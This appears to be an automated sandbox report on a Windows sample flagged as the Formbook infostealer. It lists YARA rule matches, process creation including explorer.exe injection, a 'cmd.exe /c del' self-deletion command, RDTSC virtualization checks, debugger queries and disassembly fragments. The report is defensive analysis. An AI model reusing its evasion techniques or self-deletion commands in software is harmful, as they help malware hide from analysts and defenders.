          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.0O9BJfVJi6fEMoS.exe.3d11730.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 6.2.0O9BJfVJi6fEMoS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0O9BJfVJi6fEMoS.exe, 00000000.00000002.696031440.0000000008C80000.00000004.00000001.sdmpBinary or memory string: ^.vBpq
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@12/9
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0O9BJfVJi6fEMoS.exe.logJump to behavior
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeMutant created: \Sessions\1\BaseNamedObjects\TwFbGi
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_01
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: 0O9BJfVJi6fEMoS.exeReversingLabs: Detection: 21%
          Source: unknownProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: unknownProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: unknownProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: unknownProcess created: C:\Windows\SysWOW64\autofmt.exe C:\Windows\SysWOW64\autofmt.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe
          Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess created: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe {path}
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: 0O9BJfVJi6fEMoS.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: explorer.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.732550981.0000000001610000.00000040.00000001.sdmp, explorer.exe, 0000000B.00000002.914570132.000000000512F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 0O9BJfVJi6fEMoS.exe, explorer.exe
          Source: Binary string: explorer.pdb source: 0O9BJfVJi6fEMoS.exe, 00000006.00000002.733414389.00000000032E0000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.705470471.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 0_2_051E1598 push eax; mov dword ptr [esp], ecx
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0040BAA8 push ebp; iretd
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B3F2 push eax; ret
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B3FB push eax; ret
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041C399 push edi; ret
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B3A5 push eax; ret
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041B45C push eax; ret
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00415554 push cs; iretd
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0041CE23 push esp; ret
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00413755 push eax; retf
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0168D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0508D0D1 push ecx; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0097BAA8 push ebp; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098C399 push edi; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B3A5 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B3FB push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B3F2 push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098B45C push eax; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00985554 push cs; iretd
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_0098CE23 push esp; ret
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 11_2_00983755 push eax; retf
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 00000000009785E4 second address: 00000000009785EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\explorer.exeRDTSC instruction interceptor: First address: 000000000097896E second address: 0000000000978974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe TID: 7056Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5856Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\explorer.exe TID: 6188Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000007.00000000.710461036.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.705821818.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.710461036.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.717818953.000000000FC96000.00000004.00000001.sdmpBinary or memory string: _VMware_SATA_CD00#5&
          Source: explorer.exe, 00000007.00000002.920387906.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000007.00000000.711037304.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000007.00000000.711186736.000000000A784000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: explorer.exe, 00000007.00000002.923576890.00000000058C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\explorer.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_004088A0 rdtsc
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_00409B10 LdrLoadDll,
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01654120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01639100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0163B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0165C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01662990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01701074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01650050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01650050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0164B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01704015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_01704015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_016790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exeCode function: 6_2_0166F0BF mov eax, dword ptr fs:[00000030h]
